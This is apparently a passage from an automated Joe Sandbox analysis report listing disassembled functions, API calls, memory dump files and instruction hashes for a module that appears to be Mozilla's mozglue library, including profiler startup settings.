                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6BADF688), ref: 6BAB72F7
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 557828605-0
                                                                                                                                                                                                                                      • Opcode ID: a01d0f7a30b45f44e0c91c05d60ef1eb0bacb021424e2e99dd7997b9847e746c
                                                                                                                                                                                                                                      • Instruction ID: ff403f6b98d8eea7eab09f22370fa45689b19e4739b94d02a6628e6a942d950b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a01d0f7a30b45f44e0c91c05d60ef1eb0bacb021424e2e99dd7997b9847e746c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 70519271E042698FCF08CFA8C850ABFB7B6FB89300F19861DD815A7750C775A942CB90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6BA9E3E4
                                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BA9E3F1
                                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,?), ref: 6BA9E4AB
                                                                                                                                                                                                                                        • Part of subcall function 6BA65D40: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,?,?,?,6BA9D2DA,00000001), ref: 6BA65D66
                                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BA9E4F5
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6BA9E577
                                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BA9E584
                                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BA9E5DE
                                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,00000000), ref: 6BA9E6DA
                                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6BA9E864
                                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BA9E883
                                                                                                                                                                                                                                      • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6BA9E8A6
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreememset$Xbad_function_call@std@@malloc
                                                                                                                                                                                                                                      • String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
                                                                                                                                                                                                                                      • API String ID: 905598890-53385798
                                                                                                                                                                                                                                      • Opcode ID: 0fd5e2dce92bcd2ce986c30bb66c31c67cd0d428083d52b50b2178ce78e51022
                                                                                                                                                                                                                                      • Instruction ID: cbc82ff64297eead50ca6ee1ed082255289b641fc2723a851daf1c03bc924b9b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0fd5e2dce92bcd2ce986c30bb66c31c67cd0d428083d52b50b2178ce78e51022
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D4416970A10615DFCF14DF28D490AAABBF1FF89304F04816DD8569B782D73AE895CB90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6BAADB86
                                                                                                                                                                                                                                      • ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6BAADC0E
                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6BAADC2E
                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6BAADC40
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Impl@detail@mozilla@@Mutexfree
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3186548839-0
                                                                                                                                                                                                                                      • Opcode ID: ad36bae84a72fe7fda7848bdb5cb6de5ed0465bfaaaefc04df2a4798a3ea997f
                                                                                                                                                                                                                                      • Instruction ID: 6f02b4ffddb9b38b9a5ba59d26b79a226643c9ce3e636c02d3e69594386b954e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ad36bae84a72fe7fda7848bdb5cb6de5ed0465bfaaaefc04df2a4798a3ea997f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3A417A756047009FCB10CF34C09865ABBF6BF88354F44886DE8AA87340EB35E881CB61
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6BAAA315
                                                                                                                                                                                                                                      • ?_Xbad_function_call@std@@YAXXZ.MSVCP140(?), ref: 6BAAA31F
                                                                                                                                                                                                                                      • free.MOZGLUE(00000000,?,?,?,?), ref: 6BAAA36A
                                                                                                                                                                                                                                        • Part of subcall function 6BA75E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6BA75EDB
                                                                                                                                                                                                                                        • Part of subcall function 6BA75E90: memset.VCRUNTIME140(6BAB7765,000000E5,55CCCCCC), ref: 6BA75F27
                                                                                                                                                                                                                                        • Part of subcall function 6BA75E90: LeaveCriticalSection.KERNEL32(?), ref: 6BA75FB2
                                                                                                                                                                                                                                        • Part of subcall function 6BAA2140: free.MOZGLUE(?,00000060,?,6BAA7D36,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BAA215D
                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6BAAA37C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: free$CriticalSection$EnterLeaveXbad_function_call@std@@memset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 700533648-0
                                                                                                                                                                                                                                      • Opcode ID: c7f28ba1d27d6fd82819484af338715f3a6c229cdc62d4b7e26e82b3329d164a
                                                                                                                                                                                                                                      • Instruction ID: b9271684e2eef5e6b5222f229b2ef6bfc892f227c0d68eda8a6205143b300d2c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c7f28ba1d27d6fd82819484af338715f3a6c229cdc62d4b7e26e82b3329d164a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7421F979A00624ABCF11AF16D541B5FBBEAEF85754F048065DD095B300D73AED82C6F2
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,6BA756EE,?,00000001), ref: 6BA75B85
                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6BADF688,?,?,?,6BA756EE,?,00000001), ref: 6BA75B90
                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6BADF688,?,?,?,6BA756EE,?,00000001), ref: 6BA75BD8
                                                                                                                                                                                                                                      • GetTickCount64.KERNEL32 ref: 6BA75BE4
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CriticalSection$Count64CounterEnterLeavePerformanceQueryTick
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2796706680-0
                                                                                                                                                                                                                                      • Opcode ID: 6a2b0725284ffa1f4cca18c1fa5f6d6863eab1b577ede7617123164b541bb15c
                                                                                                                                                                                                                                      • Instruction ID: e58c9ae8cbaefeb946d3df0fd085a2162bef3d85d727398c83c095893034bf2a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6a2b0725284ffa1f4cca18c1fa5f6d6863eab1b577ede7617123164b541bb15c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9621AD756093449FCF08DF28C85465ABBE5EBCE610F04C92EE99A83790DB30E805CB41
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6BAA1B98
                                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(?,?,6BAA1D96,00000000), ref: 6BAA1BA1
                                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?,?,6BAA1D96,00000000), ref: 6BAA1BB5
                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BAA1C25
                                                                                                                                                                                                                                        • Part of subcall function 6BAA1C60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,6BAA759E,?,?), ref: 6BAA1CB4
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExclusiveLock$AcquireCurrentNow@ReleaseStamp@mozilla@@ThreadTimeV12@_free
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3699359333-0
                                                                                                                                                                                                                                      • Opcode ID: 8bbb4dda165d23f980c0da5b2c640585b9200037a904e3c327bdef62e2514cc3
                                                                                                                                                                                                                                      • Instruction ID: a2dc820a8fe37ce87ed84a00412331c7115897e654ecc8a0e83eaadea5988887
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8bbb4dda165d23f980c0da5b2c640585b9200037a904e3c327bdef62e2514cc3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6921BD70A04224ABDF009F26C88577FBBB4AB87B44F44445DD9125B281DB7DA882CBA1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: __aulldiv
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3732870572-0
                                                                                                                                                                                                                                      • Opcode ID: d00a51c4c5f930f9caa17efa13413b4b30e460f116377f5c22957434e894d04c
                                                                                                                                                                                                                                      • Instruction ID: d1e24ba13b02d27c6fc7977584f962a9ebe56317843cee8cae355889d5f1b8ed
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d00a51c4c5f930f9caa17efa13413b4b30e460f116377f5c22957434e894d04c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 79214DB1A006096FD714CF7DDC82E67B7F8EB85714B10863EE05ADB640E674A8408BA0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6BA6BF00: ??0ios_base@std@@IAE@XZ.MSVCP140(?,?,?,?,6BAB7A3F), ref: 6BA6BF11
                                                                                                                                                                                                                                        • Part of subcall function 6BA6BF00: ?init@?$basic_ios@DU?$char_traits@D@std@@@std@@IAEXPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@_N@Z.MSVCP140(?,00000000,?,6BAB7A3F), ref: 6BA6BF5D
                                                                                                                                                                                                                                        • Part of subcall function 6BA6BF00: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,6BAB7A3F), ref: 6BA6BF7E
                                                                                                                                                                                                                                      • ?setprecision@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140(?,00000013,00000000), ref: 6BAB7A48
                                                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_K@Z.MSVCP140(?,?), ref: 6BAB7A7A
                                                                                                                                                                                                                                        • Part of subcall function 6BA69830: free.MOZGLUE(?,?,?,6BAB7ABE), ref: 6BA6985B
                                                                                                                                                                                                                                      • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 6BAB7AC0
                                                                                                                                                                                                                                      • ??1ios_base@std@@UAE@XZ.MSVCP140 ref: 6BAB7AC8
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_streambuf@??0ios_base@std@@??1?$basic_streambuf@??1ios_base@std@@??6?$basic_ostream@?init@?$basic_ios@?setprecision@std@@D@std@@@2@_J@1@_Smanip@_U?$_V01@_V?$basic_streambuf@free
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3421697164-0
                                                                                                                                                                                                                                      • Opcode ID: 2732cb90cac70ae612874137bf7542b24729180531f5a059a961cbefcfd33d22
                                                                                                                                                                                                                                      • Instruction ID: ec1df5a8a179eaa1ae4b4c2847f29323802e57b1f812dbe50996febb968ce808
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2732cb90cac70ae612874137bf7542b24729180531f5a059a961cbefcfd33d22
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B0215C756043049FCB14DF28D895A9EBBE5FFC9354F40882CE88A87351DB34E94ACB92
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6BA6BF00: ??0ios_base@std@@IAE@XZ.MSVCP140(?,?,?,?,6BAB7A3F), ref: 6BA6BF11
                                                                                                                                                                                                                                        • Part of subcall function 6BA6BF00: ?init@?$basic_ios@DU?$char_traits@D@std@@@std@@IAEXPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@_N@Z.MSVCP140(?,00000000,?,6BAB7A3F), ref: 6BA6BF5D
                                                                                                                                                                                                                                        • Part of subcall function 6BA6BF00: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,6BAB7A3F), ref: 6BA6BF7E
                                                                                                                                                                                                                                      • ?setprecision@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140(?,00000012,00000000), ref: 6BAB7968
                                                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_J@Z.MSVCP140(6BABA264,6BABA264), ref: 6BAB799A
                                                                                                                                                                                                                                        • Part of subcall function 6BA69830: free.MOZGLUE(?,?,?,6BAB7ABE), ref: 6BA6985B
                                                                                                                                                                                                                                      • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 6BAB79E0
                                                                                                                                                                                                                                      • ??1ios_base@std@@UAE@XZ.MSVCP140 ref: 6BAB79E8
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_streambuf@??0ios_base@std@@??1?$basic_streambuf@??1ios_base@std@@??6?$basic_ostream@?init@?$basic_ios@?setprecision@std@@D@std@@@2@_J@1@_Smanip@_U?$_V01@_V?$basic_streambuf@free
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3421697164-0
                                                                                                                                                                                                                                      • Opcode ID: 1ce7da06c96d33252a580cb5f0313cced44eab81874a5be7c3070b950fe6598a
                                                                                                                                                                                                                                      • Instruction ID: 3d84f17973ef04e324a91d2b79d19b852310015bc19a510fbbdffe62dec3a7d6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1ce7da06c96d33252a580cb5f0313cced44eab81874a5be7c3070b950fe6598a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7E218C756043049FCB04DF28D885A9EBBE5EFC9314F40882CE88A87351DB34E94ACB92
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6BABAAF8
                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6BADF770,?,6BA7BF9F), ref: 6BABAB08
                                                                                                                                                                                                                                      • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,6BA7BF9F), ref: 6BABAB39
                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6BADF770,?,?,?,?,?,?,?,?,6BA7BF9F), ref: 6BABAB6B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CriticalSection$CurrentEnterLeaveThread_stricmp
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1951318356-0
                                                                                                                                                                                                                                      • Opcode ID: 83a55fed36b9e72454e922747ffdaf564819a186c5bff82fea079e25ce6dbf01
                                                                                                                                                                                                                                      • Instruction ID: 0de44a48af1c0f171870e9e3818c91ca3906a6f8951363ffa40795f1cab92446
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 83a55fed36b9e72454e922747ffdaf564819a186c5bff82fea079e25ce6dbf01
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A41130B1E042199FCF00DFA8D88999FBBB9FF893057444429E51597301EB35E94ACBA1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6BAA205B
                                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(?,?,?,00000000,?,6BAA201B,?,?,?,?,?,?,?,6BAA1F8F,?,?), ref: 6BAA2064
                                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6BAA208E
                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,00000000,?,6BAA201B,?,?,?,?,?,?,?,6BAA1F8F,?,?), ref: 6BAA20A3
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2047719359-0
                                                                                                                                                                                                                                      • Opcode ID: 95070693bdbb524671682d0578b5bd6942122f1185616b1a0071f798ed0bbaa6
                                                                                                                                                                                                                                      • Instruction ID: 6fbdfa6eed3859482f45d792acc86d62ef2cd9d6668f7ea863c83f14bf26ca7a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 95070693bdbb524671682d0578b5bd6942122f1185616b1a0071f798ed0bbaa6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E7F0B4B50047009BCB219F16D88475BBBF9EFCA324F10012EE54687710CB76E842CBA6
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6BA9EB11
                                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BA9EB1E
                                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,000000E0), ref: 6BA9EB3C
                                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6BADF4B8), ref: 6BA9EB5B
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6BA9EBA4
                                                                                                                                                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000), ref: 6BA9EBAC
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6BA9EBC1
                                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6BADF4B8,?,?,00000000), ref: 6BA9EBCE
